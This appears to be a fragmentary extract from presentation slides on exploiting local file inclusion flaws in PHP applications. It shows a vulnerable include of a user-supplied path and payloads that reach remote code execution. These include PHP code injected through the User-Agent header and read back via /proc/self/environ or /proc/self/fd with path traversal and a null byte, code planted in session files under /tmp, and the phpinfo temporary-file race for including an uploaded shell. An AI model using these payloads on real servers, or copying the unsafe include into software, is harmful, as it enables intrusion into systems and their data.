  • 17. LFI exploitation use ProcFS features ... include '/var/www/'.$_GET['file']; ... index.php /proc/self/fd/[0-9] apache log files located at 2 and 7 ... USER_AGENT=<?php system('id'); ?> ... environ ?file=../../proc/slef/environ%00 ... User-Agent: <?php system('id'); ?>
  • 18. LFI exploitation Use session files ... $_SESSION['var'] = $_GET['var']; include '/var/www/'.$_GET['file']; ... index.php ?var=<?php phpinfo(); ? >&file=../../tmp/ sess_blablablabla blablablabla - PHPSESSID value
  • 19. LFI exploitation phpinfo trick ... include '/var/www/'.$_GET['file']; ... index.php ... phpinfo(); ... i.php 1. Send $_FILE with shell.php 2. Parse temp filename, without closing socket 3. include file using temp file name